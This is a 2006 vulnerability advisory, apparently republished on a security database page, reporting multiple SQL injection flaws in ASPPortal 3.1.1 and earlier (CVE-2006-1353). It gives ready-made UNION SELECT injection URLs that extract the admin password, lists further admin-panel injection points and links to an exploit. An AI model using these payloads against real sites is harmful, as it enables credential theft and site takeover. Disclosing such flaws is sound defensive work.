ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities

2006.03.23
Credit: nukedx
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-1353
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report-- Advisory: ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 20/03/06 11:14 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: ASPPortal (http://www.ASPPortal.net/) Version: 3.1.1 and prior versions must be affected. About: There is lots of SQL injections in modules of ASPPortal via this methods remote attacker can inject arbitrary SQL queries.In below i included some with their examples and also coded exploit for second one exploit decrypts password which comes from SQL injection too, Because ASPPortal has it own crypting mechanism.As you can see in downloads module page download_click.asp's downloadid parameter and news module page News_Item.asp's content_ID parameter did not sanitized properly.Also there is some SQL injections in admin panel but for using them you need admin access.You can found them in below as ADMINGET and ADMINPOST tags. Level: Critical --- How&Example: GET -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=[SQL Code] GET -> http://[site]/apdir/content/news/News_Item.asp?content_ID=[SQLCode] Example -> http://[site]/apdir/content/downloads/download_click.asp?downloadid=-1+U NION+SELECT+0,0,0,0,0,0,0,0,0,0, password+FROM+users+where+username='admin' Example -> http://[site]/apdir/content/news/News_Item.asp?content_ID=-1+UNION+SELEC T+username,password,0,0, group_id,email,0,0,0,0,0,0,0,0,0,0+FROM+users+where+username='admin' With this examples remote attacker could get admin's pass and can login from /content/users/login.asp ADMINGET -> http://[site]/apdir/content/users/add_edit_user.asp?page_type=2&user_id= [SQLCode] ADMINGET -> http://[site]/apdir/content/banner_adds/banner_add_edit.asp?pagetype=2&b annerid=[SQLCode] ADMINGET -> http://[site]/apdir/content/categories/add_edit_cat.asp?page_type=2&cat_ id=[SQLCode] ADMINGET -> http://[site]/apdir/content/News/add_edit_news.asp?page_type=2&Content_I D=[SQLCode] ADMINGET -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=2& download_id=[SQLCode] ADMINGET -> http://[site]/apdir/content/poll/add_edit_poll.asp?page_type=2&Poll_ID=[ SQLCode] ADMINGET -> http://[site]/apdir/content/contactus/contactus_add_edit.asp?contactid=[ SQLCode]&pageid=2 ADMINGET -> http://[site]/apdir/content/poll/poll_list.asp?sortby=[SQLCode]&page_no= 1 ADMINPOST -> http://[site]/apdir/content/downloads/add_edit_download.asp?page_type=1 -- Timeline: * 20/03/2006: Vulnerability found. * 20/03/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=21 --- References: http://www.milw0rm.com/id.php?id=1597 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=21


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top